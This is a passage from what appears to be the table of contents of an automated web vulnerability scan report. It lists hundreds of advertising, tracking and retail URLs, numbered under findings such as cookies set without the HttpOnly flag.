10.244. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=27582677/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.245. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=28183863/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.246. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=3488355/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.247. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=42950117/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.248. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=45425146/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.249. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=54039788/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.250. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=58502192/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.251. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=63972603/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.252. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=66502577/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.253. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=77103321/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.254. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=83819639/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.255. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=83891309/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.256. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=84418946/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.257. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=93497556/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.258. http://r1-ads.ace.advertising.com/site=804480/size=300250/u=2/bnum=2746764/hr=7/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.259. http://r1-ads.ace.advertising.com/site=804480/size=300250/u=2/bnum=76077167/hr=7/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.260. http://r1-ads.ace.advertising.com/site=804481/size=728090/u=2/bnum=22657113/hr=8/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.261. http://r1-ads.ace.advertising.com/site=804481/size=728090/u=2/bnum=91341378/hr=8/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.262. http://rover.ebay.com/ar/1/76417/4

10.263. http://rover.ebay.com/ar/1/76418/4

10.264. http://rp.gwallet.com/r1/ucm

10.265. http://rs.gwallet.com/r1/pixel/x113

10.266. http://rs.gwallet.com/r1/pixel/x9r8101111

10.267. http://rs.gwallet.com/r1/pixel/x9r8962146

10.268. http://rt.legolas-media.com/lgrt

10.269. http://sales.liveperson.net/hc/55601019/

10.270. http://sales.liveperson.net/hc/57386690/

10.271. http://segment-pixel.invitemedia.com/pixel

10.272. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543418%22%20height=%221%22%20width=%221

10.273. http://services.krxd.net/geoip

10.274. http://services.krxd.net/pixel.gif

10.275. http://sync.mathtag.com/sync

10.276. http://tacoda.at.atwola.com/rtx/r.gif

10.277. http://tags.bluekai.com/site/2831

10.278. http://tags.bluekai.com/site/2939

10.279. http://tags.bluekai.com/site/3561

10.280. http://tags.bluekai.com/site/38

10.281. http://tags.bluekai.com/site/3834

10.282. http://tags.bluekai.com/site/450

10.283. http://tap.rubiconproject.com/oz/feeds/targus/profile

10.284. http://tap.rubiconproject.com/oz/sensor

10.285. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js

10.286. http://va.px.invitemedia.com/pixel

10.287. http://va.px.invitemedia.com/set_partner_uid

10.288. http://view.c3metrics.com/c3VTabstrct-6-2.php

10.289. http://www.bizographics.com/collect/

10.290. http://www.burstnet.com/enlightn/7644//AC95/

10.291. http://www.capitalone.com/creditcards/gateway/

10.292. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/cartdrpdwn_Checkout.png

10.293. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/orange_arrow.gif

10.294. http://www.homedepot.com/webapp/wcs/stores/servlet/ProductDisplay

10.295. http://www.wtp101.com/admeld_sync

11. Cookie without HttpOnly flag set

11.1. http://afe.specificclick.net/

11.2. http://afe.specificclick.net/serve/v=5

11.3. http://cts-log.channelintelligence.com/

11.4. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/

11.5. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/

11.6. http://lightsquared.com/

11.7. http://login.dotomi.com/ucm/UCMController

11.8. http://pixel.adsafeprotected.com/jspix

11.9. http://pixel.everesttech.net/1688/i

11.10. http://sales.liveperson.net/visitor/addons/deploy.asp

11.11. http://sales.liveperson.net/visitor/addons/deploy.asp

11.12. http://sales.liveperson.net/visitor/addons/deploy.asp

11.13. http://sales.liveperson.net/visitor/addons/deploy.asp

11.14. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

11.15. http://t.mookie1.com/t/v1/imp

11.16. http://ttwbs.channelintelligence.com/

11.17. http://www.creditcards.com/actions/clickBack.php

11.18. http://www.creditcards.com/oc/

11.19. http://www.creditcards.com/xtrack.php

11.20. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation

11.21. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation

11.22. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation

11.23. http://www.homedepot.com/webapp/wcs/stores/servlet/Bopis2OverLay

11.24. http://www.homedepot.com/webapp/wcs/stores/servlet/Navigation

11.25. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate

11.26. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemAddService

11.27. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemDisplay

11.28. http://www.homedepot.com/webapp/wcs/stores/servlet/QuickViewService

11.29. http://www.ilslaunch.com/skyterra-1-mission-control

11.30. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

11.31. http://a.amxdt.com/px/

11.32. http://a.rfihub.com/cm

11.33. http://a.rfihub.com/cm

11.34. http://a.rfihub.com/sed

11.35. http://a.rfihub.com/tk.gif

11.36. http://a.tribalfusion.com/i.match

11.37. http://a.tribalfusion.com/j.ad

11.38. http://a1.interclick.com/ColDta.aspx

11.39. http://a1.interclick.com/Segment.aspx

11.40. http://a1.interclick.com/getInPageJSProcess.aspx

11.41. http://a1.interclick.com/getInPageJSProcess.aspx

11.42. http://ad.yieldmanager.com/imp

11.43. http://ad.yieldmanager.com/pixel

11.44. http://ad.yieldmanager.com/unpixel

11.45. http://ads.bridgetrack.com/track/f/

11.46. http://ads.revsci.net/adserver/ako

11.47. http://ads.revsci.net/adserver/ako

11.48. http://ads.revsci.net/adserver/ako

11.49. http://ads.undertone.com/ajs.php

11.50. http://ads.undertone.com/fc.php

11.51. http://ads.undertone.com/l

11.52. http://ads.undertone.com/l

11.53. http://ads.undertone.com/l

11.54. http://ads.undertone.com/l

11.55. http://ads.undertone.com/l

11.56. http://ads.undertone.com/l

11.57. http://ads.undertone.com/l

11.58. http://ads.undertone.com/l

11.59. http://ads.undertone.com/l

11.60. http://ads.undertone.com/l

11.61. http://ads.undertone.com/l

11.62. http://ads.undertone.com/l

11.63. http://ads.undertone.com/l

11.64. http://ads.undertone.com/l

11.65. http://ads.undertone.com/l

11.66. http://adsfac.us/ag.asp

11.67. http://adsfac.us/ag.asp

11.68. http://ak1.abmr.net/is/ads.undertone.com

11.69. http://ak1.abmr.net/is/r1-ads.ace.advertising.com

11.70. http://ak1.abmr.net/is/tag.admeld.com

11.71. http://ak1.abmr.net/is/www.homedepot.com

11.72. http://amch.questionmarket.com/adsc/d844890/33/39959888/decide.php

11.73. http://amch.questionmarket.com/adsc/d844890/33/39959895/decide.php

11.74. http://amch.questionmarket.com/adsc/d844890/33/39959897/decide.php

11.75. http://api.bizographics.com/v1/profile.json

11.76. http://api.bizographics.com/v1/profile.redirect

11.77. http://ar.voicefive.com/b/wc_beacon.pli

11.78. http://ar.voicefive.com/bmx3/broker.pli

11.79. http://ar.voicefive.com/bmx3/broker.pli

11.80. http://ar.voicefive.com/bmx3/broker.pli

11.81. http://b.scorecardresearch.com/b

11.82. http://b.scorecardresearch.com/r

11.83. http://b.voicefive.com/b

11.84. http://bs.serving-sys.com/BurstingPipe/adServer.bs

11.85. http://c7.zedo.com/img/bh.gif

11.86. http://cas.criteo.com/delivery/afr.php

11.87. http://citi.bridgetrack.com/usc/_spredir.htm

11.88. http://citi.bridgetrack.com/usc/_spredir.htm

11.89. http://click.linksynergy.com/fs-bin/click

11.90. http://creditcards.citicards.com/usc/Dividend/May2011/Q2/12mo/100cash/default.htm

11.91. http://creditcards.citicards.com/usc/platinum/MC/external/affiliate/Mar2011/default.htm

11.92. http://creditcards.citicards.com/usc/platinum/Visa/external/affiliate/Mar2011/default.htm

11.93. http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/default.htm

11.94. http://creditcards.citicards.com/usc/value/diamond_preferred/MAr2011pricing/external/default.htm

11.95. http://d7.zedo.com/img/bh.gif

11.96. http://dis.ny.us.criteo.com/dis/dis.aspx

11.97. http://idcs.interclick.com/Segment.aspx

11.98. http://ilslaunch.app2.hubspot.com/salog.js.aspx

11.99. http://image2.pubmatic.com/AdServer/Pug

11.100. http://imp.constantcontact.com/imp/cmp.jsp

11.101. http://js.revsci.net/common/pcx.js

11.102. http://js.revsci.net/gateway/gw.js

11.103. http://leadback.advertising.com/adcedge/lb

11.104. http://map.media6degrees.com/orbserv/hbpix

11.105. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1049999702@x15

11.106. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1061037567@x15

11.107. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1071006765@x15

11.108. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1102913360@x15

11.109. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1127856009@x15

11.110. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1245329572@x15

11.111. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1275267067@x15

11.112. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1286122757@x15

11.113. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1461570951@x15

11.114. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1584817229@x15

11.115. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1608535405@x15

11.116. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1646228634@x15

11.117. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1662691403@x15

11.118. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1729780354@x15

11.119. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1767572891@x15

11.120. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1809071643@x15

11.121. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1837611586@x15

11.122. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1851473663@x15

11.123. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1933034357@x15

11.124. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1938155974@x15

11.125. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1059242575@Top1

11.126. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1091147736@Top1

11.127. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1098629905@Top1

11.128. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1187700357@Top1

11.129. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1236153237@Top1

11.130. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1319798396@Top1

11.131. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1359015114@Top1

11.132. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1443368947@Top1

11.133. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1512823451@Top1

11.134. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1515366038@Top1

11.135. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1551279173@Top1

11.136. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1704218535@Top1

11.137. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1726433512@Top1

11.138. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1777416209@Top1

11.139. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1815229995@Top1

11.140. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1861592040@Top1

11.141. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1885484252@Top1

11.142. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1930646721@Top1

11.143. http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js

11.144. http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js

11.145. http://optimized-by.rubiconproject.com/a/dk.html

11.146. http://optimized-by.rubiconproject.com/a/dk.html

11.147. http://optimized-by.rubiconproject.com/a/dk.js

11.148. http://optimized-by.rubiconproject.com/a/dk.js

11.149. http://p.opt.fimserve.com/bht/

11.150. http://pbid.pro-market.net/engine

11.151. http://phoenix.untd.com/TRCK/RGST

11.152. http://pix04.revsci.net/D10889/a1/0/3/0.gif

11.153. http://pix04.revsci.net/D10889/a1/0/3/0.gif

11.154. http://pix04.revsci.net/D10889/a1/0/3/0.gif

11.155. http://pix04.revsci.net/E06560/b3/0/3/noscript.gif

11.156. http://pix04.revsci.net/G07608/a4/0/0/pcx.js

11.157. http://pix04.revsci.net/I10985/b3/0/3/1008211/111571878.js

11.158. http://pix04.revsci.net/I10985/b3/0/3/1008211/118546994.js

11.159. http://pix04.revsci.net/I10985/b3/0/3/1008211/128597095.js

11.160. http://pix04.revsci.net/I10985/b3/0/3/1008211/149141737.js

11.161. http://pix04.revsci.net/I10985/b3/0/3/1008211/152539728.js

11.162. http://pix04.revsci.net/I10985/b3/0/3/1008211/153416135.js

11.163. http://pix04.revsci.net/I10985/b3/0/3/1008211/167338616.js

11.164. http://pix04.revsci.net/I10985/b3/0/3/1008211/174739392.js

11.165. http://pix04.revsci.net/I10985/b3/0/3/1008211/178674175.js

11.166. http://pix04.revsci.net/I10985/b3/0/3/1008211/204994515.js

11.167. http://pix04.revsci.net/I10985/b3/0/3/1008211/20510025.js

11.168. http://pix04.revsci.net/I10985/b3/0/3/1008211/206078584.js

11.169. http://pix04.revsci.net/I10985/b3/0/3/1008211/209054641.js

11.170. http://pix04.revsci.net/I10985/b3/0/3/1008211/210088310.js

11.171. http://pix04.revsci.net/I10985/b3/0/3/1008211/235290478.js

11.172. http://pix04.revsci.net/I10985/b3/0/3/1008211/242178359.js

11.173. http://pix04.revsci.net/I10985/b3/0/3/1008211/252539645.js

11.174. http://pix04.revsci.net/I10985/b3/0/3/1008211/266352153.js

11.175. http://pix04.revsci.net/I10985/b3/0/3/1008211/266715150.js

11.176. http://pix04.revsci.net/I10985/b3/0/3/1008211/266829410.js

11.177. http://pix04.revsci.net/I10985/b3/0/3/1008211/271822828.js

11.178. http://pix04.revsci.net/I10985/b3/0/3/1008211/298241288.js

11.179. http://pix04.revsci.net/I10985/b3/0/3/1008211/306033605.js

11.180. http://pix04.revsci.net/I10985/b3/0/3/1008211/31221949.js

11.181. http://pix04.revsci.net/I10985/b3/0/3/1008211/319879025.js

11.182. http://pix04.revsci.net/I10985/b3/0/3/1008211/321200067.js

11.183. http://pix04.revsci.net/I10985/b3/0/3/1008211/325815715.js

11.184. http://pix04.revsci.net/I10985/b3/0/3/1008211/329181290.js

11.185. http://pix04.revsci.net/I10985/b3/0/3/1008211/351391247.js

11.186. http://pix04.revsci.net/I10985/b3/0/3/1008211/35234473.js

11.187. http://pix04.revsci.net/I10985/b3/0/3/1008211/352735390.js

11.188. http://pix04.revsci.net/I10985/b3/0/3/1008211/400010602.js

11.189. http://pix04.revsci.net/I10985/b3/0/3/1008211/4030732.js

11.190. http://pix04.revsci.net/I10985/b3/0/3/1008211/411814556.js

11.191. http://pix04.revsci.net/I10985/b3/0/3/1008211/434601309.js

11.192. http://pix04.revsci.net/I10985/b3/0/3/1008211/448263760.js

11.193. http://pix04.revsci.net/I10985/b3/0/3/1008211/450083429.js

11.194. http://pix04.revsci.net/I10985/b3/0/3/1008211/469061960.js

11.195. http://pix04.revsci.net/I10985/b3/0/3/1008211/47135208.js

11.196. http://pix04.revsci.net/I10985/b3/0/3/1008211/474207582.js

11.197. http://pix04.revsci.net/I10985/b3/0/3/1008211/48193081.js

11.198. http://pix04.revsci.net/I10985/b3/0/3/1008211/482745036.js

11.199. http://pix04.revsci.net/I10985/b3/0/3/1008211/518130278.js

11.200. http://pix04.revsci.net/I10985/b3/0/3/1008211/541993060.js

11.201. http://pix04.revsci.net/I10985/b3/0/3/1008211/572738137.js

11.202. http://pix04.revsci.net/I10985/b3/0/3/1008211/579855884.js

11.203. http://pix04.revsci.net/I10985/b3/0/3/1008211/602675862.js

11.204. http://pix04.revsci.net/I10985/b3/0/3/1008211/603496051.js

11.205. http://pix04.revsci.net/I10985/b3/0/3/1008211/609031637.js

11.206. http://pix04.revsci.net/I10985/b3/0/3/1008211/609523113.js

11.207. http://pix04.revsci.net/I10985/b3/0/3/1008211/61287048.js

11.208. http://pix04.revsci.net/I10985/b3/0/3/1008211/616476492.js

11.209. http://pix04.revsci.net/I10985/b3/0/3/1008211/623863779.js

11.210. http://pix04.revsci.net/I10985/b3/0/3/1008211/632139984.js

11.211. http://pix04.revsci.net/I10985/b3/0/3/1008211/656764106.js

11.212. http://pix04.revsci.net/I10985/b3/0/3/1008211/663059389.js

11.213. http://pix04.revsci.net/I10985/b3/0/3/1008211/677906397.js

11.214. http://pix04.revsci.net/I10985/b3/0/3/1008211/678221040.js

11.215. http://pix04.revsci.net/I10985/b3/0/3/1008211/697771504.js

11.216. http://pix04.revsci.net/I10985/b3/0/3/1008211/700812667.js

11.217. http://pix04.revsci.net/I10985/b3/0/3/1008211/7130573.js

11.218. http://pix04.revsci.net/I10985/b3/0/3/1008211/715243108.js

11.219. http://pix04.revsci.net/I10985/b3/0/3/1008211/719321222.js

11.220. http://pix04.revsci.net/I10985/b3/0/3/1008211/727551731.js

11.221. http://pix04.revsci.net/I10985/b3/0/3/1008211/743305953.js

11.222. http://pix04.revsci.net/I10985/b3/0/3/1008211/743306396.js

11.223. http://pix04.revsci.net/I10985/b3/0/3/1008211/747675233.js

11.224. http://pix04.revsci.net/I10985/b3/0/3/1008211/750853358.js

11.225. http://pix04.revsci.net/I10985/b3/0/3/1008211/759659174.js

11.226. http://pix04.revsci.net/I10985/b3/0/3/1008211/773834418.js

11.227. http://pix04.revsci.net/I10985/b3/0/3/1008211/778726069.js

11.228. http://pix04.revsci.net/I10985/b3/0/3/1008211/783069022.js

11.229. http://pix04.revsci.net/I10985/b3/0/3/1008211/791107298.js

11.230. http://pix04.revsci.net/I10985/b3/0/3/1008211/811937771.js

11.231. http://pix04.revsci.net/I10985/b3/0/3/1008211/812722846.js

11.232. http://pix04.revsci.net/I10985/b3/0/3/1008211/814191239.js

11.233. http://pix04.revsci.net/I10985/b3/0/3/1008211/821864121.js

11.234. http://pix04.revsci.net/I10985/b3/0/3/1008211/833474274.js

11.235. http://pix04.revsci.net/I10985/b3/0/3/1008211/837302366.js

11.236. http://pix04.revsci.net/I10985/b3/0/3/1008211/851863014.js

11.237. http://pix04.revsci.net/I10985/b3/0/3/1008211/85990292.js

11.238. http://pix04.revsci.net/I10985/b3/0/3/1008211/870883424.js

11.239. http://pix04.revsci.net/I10985/b3/0/3/1008211/8734315.js

11.240. http://pix04.revsci.net/I10985/b3/0/3/1008211/896562366.js

11.241. http://pix04.revsci.net/I10985/b3/0/3/1008211/91490024.js

11.242. http://pix04.revsci.net/I10985/b3/0/3/1008211/922092432.js

11.243. http://pix04.revsci.net/I10985/b3/0/3/1008211/927091024.js

11.244. http://pix04.revsci.net/I10985/b3/0/3/1008211/92794223.js

11.245. http://pix04.revsci.net/I10985/b3/0/3/1008211/944603151.js

11.246. http://pix04.revsci.net/I10985/b3/0/3/1008211/948985352.js

11.247. http://pix04.revsci.net/I10985/b3/0/3/1008211/959799423.js

11.248. http://pix04.revsci.net/I10985/b3/0/3/1008211/961894975.js

11.249. http://pix04.revsci.net/I10985/b3/0/3/1008211/97296821.js

11.250. http://pix04.revsci.net/I10985/b3/0/3/1008211/978202705.js

11.251. http://pixel.quantserve.com/pixel

11.252. http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif

11.253. http://pixel.quantserve.com/seg/p-9eJ8k4iSzux46.js

11.254. http://pixel.rubiconproject.com/di.php

11.255. http://pixel.rubiconproject.com/tap.php

11.256. http://pixel.rubiconproject.com/tap.php

11.257. http://pixel.rubiconproject.com/tap.php

11.258. http://r.turn.com/r/beacon

11.259. http://r.turn.com/server/pixel.htm

11.260. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=16893018/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.261. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=22319790/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.262. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=33615280/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.263. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=43472790/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.264. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=46970102/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.265. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=61218373/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.266. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=63221864/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.267. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=63734715/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.268. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=74200963/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.269. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=74864635/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.270. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=75388116/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.271. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=76474621/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.272. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=83985251/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.273. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=90208788/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.274. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=90827809/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

